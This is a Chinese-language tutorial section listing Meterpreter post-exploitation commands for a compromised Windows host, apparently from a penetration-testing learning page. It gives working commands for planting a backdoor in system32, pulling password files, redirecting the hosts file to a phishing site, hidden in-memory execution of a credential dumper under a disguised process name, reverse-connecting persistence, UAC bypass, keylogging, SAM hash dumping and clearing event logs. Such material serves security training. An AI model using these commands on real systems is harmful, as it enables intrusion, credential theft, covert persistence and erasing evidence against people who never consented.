（六）Meterpreter常用命令

1、background命令 。返回，把meterpreter后台挂起


2、sessions命令
sessions 命令可以查看已经成功获取的会话


可以使用sessions -i 连接到指定序号的meterpreter会话已继续利用sessions -i 1 链接第一个会话主机




3、shell命令 。获取目标主机的远程命令行shell


4、cat命令。查看目标主机上的文档内容
例如：cat  C:/password.txt 查看目标主机c盘下的password.txt文件内容



5、getwd命令。获取系统工作的当前目录


6、upload命令 。上传文件到目标主机，
例如把后门程序setup.exe传到目标主机system32目录下
upload  setup.exe  C:\\windows\\system32\






7、download命令。把目标主机上的文件下载到我们的攻击主机上
例如：把目标主机C盘根目录下的password.txt文件下载到攻击主机的/tmp/目录下
download  C:\\password.txt    /tmp/





8、edit命令。调用vi编辑器，对目标主机上的文件修改
例如修改目标主机上的hosts文件，使得目标主机访问baidu时去到准备好的钓鱼网站
（仅限实验用途）路径C:\WINDOWS\system32\drivers\etc\hosts
meterpreter > edit  C:\\WINDOWS\\system32\\drivers\\etc\\hosts



在目标主机上ping www.baidu.com，出来的目标IP就是我们修改的192.168.10.10了





9、search命令。在目标主机文件系统上查找搜索文件
例如：search  -d  c:\\  -f  *.txt -d定义路径; -f定义文件类型在目标主机C盘下搜索txt文档



10、ipconfig命令。查看目标主机上的网络参数




11、portfwd命令。端口转发
例如目标主机上开启了3389，但是只允许特定IP访问，攻击主机无法连接，可以使用portfwd命令把目标主机的3389端口转发到其他端口打开。

例如：portfwd  add -l  1122 -p 3389  -r  192.168.111.149 (这里的ip地址实际上被控端的IP，监听的端口实际上时运行metasploit那台机器的端口，然后请求这台机器的ip，及监听的端口就可以了)
-l 监听的本机端口
-p 远程的端口
-r 远程ip地址




把目标主机192.168.111.147 的3389端口转发到本地1111端口这时只需要连接本地的IP:1111端口就可以打开远程桌面了
rdesktop  -u  账号  -p  密码  本地IP:1111







12、route命令。显示目标主机上的主机路由表




13、getuid  查看meterpreter注入到目标主机的进程所属用户




14、sysinfo 。查看目标主机系统信息





15、ps命令。查看目标主机上运行的进程信息，结合migrate使用




16、migrate。将meterpreter会话移植到另一个进程
例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的，那么对方一旦关闭掉该word文档，我们获取到的meterpreter会话就会随之关闭，所以把会话进程注入到explorer.exe是一个好方法。
可以先用ps命令看一下目标主机的explorer.exe进程的pid:是396



然后我们用migrate 396 把meterpreter会话1172 注入进去





17、execute命令。在目标主机上运行某个程序
例如我们目前注入进程到explorer.exe后，运行用户为超级管理员administrator
我们运行一下目标主机上的记事本程序
execute  -f  notepad.exe






这样太明显，如果希望隐藏后台执行，加参数-H
execute  -H -f  notepad.exe
此时目标主机桌面没反应，但我们在meterpreter会话上使用ps命令看到了






我们运行目标主机上的cmd.exe程序，并以隐藏的方式直接交互到我们的meterpreter会话上
命令：execute  -H -i -f  cmd.exe   类似shell




在目标主机内存中直接执行我们攻击主机上的攻击程序，比如wce.exe(获取密码hash值)，又比如木马等，这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。
execute  -H -m -d notepad.exe -f  wce.exe -a "-o  wce.txt"
-d  在目标主机执行时显示的进程名称（用以伪装）
-m 直接从内存中执行
-f   使用文件(程序)
-a  使用路径 参数: <地址>
-o  保存所有的输出到一个文件 参数:<文件名>




这里不加-m执行成功, 可能是虚拟机原因。 获取到当前登录的账号密码保存到了文件

进入shell界面直接执行wce_64.exe程序,列出内存中的值:



18、getpid
获取meterpreter会话在目标主机上注入进程的进程号





19、shutdown命令
关闭目标主机




20、调用post/windows/gather/checkvm后渗透模块，确定目标主机是否是一台虚拟机
命令：
run  post/windows/gather/checkvm
效果如下图：




21、persistence后渗透模块向目标主机植入后门程序
命令：run persistence -X -i 5 -p 攻击者监听端口  -r 攻击者监听的服务器地址
-X 在目标主机上开机自启动
-i  不断尝试反向连接的时间间隔
效果如下图：




21、persistence后渗透模块在高版本msf中移动到了一个单独的模块
命令：background 退出会话
use exploit/windows/local/persistence 使用持久化模块
set session 1 设置会话ID
exploit 执行




执行过程：
创建攻击载荷->攻击载荷植入到目标主机c:\windows\temp目录下，是一个.vbs的脚本->写目标主机注册表键值实现开机自动运行。
下图，在攻击主机上监听4444端口，等待反弹会话成功




22、调用enable_rdp模块开启远程桌面
需要system权限开启
命令：run post/windows/manage/enable_rdp
如下图：




执行成功，可以使用kali的rdesktop命令使用远程桌面连接目标主机
rdesktop  -u  kali  -p  kali  192.168.111.146:3389
或者windows远程桌面




23、getuid   查看当前的登录权限




24、提权命令getsystem
使用getsystem提升当前进程执行账户为system用户，拿到系统最高权限
直接提权失败 , 需要绕过UAC再提权
使用模块绕过
use exploit/windows/local/bypassuac





25、键盘记录器功能
命令：run post/windows/capture/keylog_recorder





26、系统账号密码获取
命令：run post/windows/gather/hashdump
在获得system权限的情况下，使用hashdump命令可以到处目标主机的SAM文件，获取目标主机的账号密码hash信息，剩下的可以用爆破软件算出明文密码
效果如图：





27、clearev命令
入侵痕迹擦除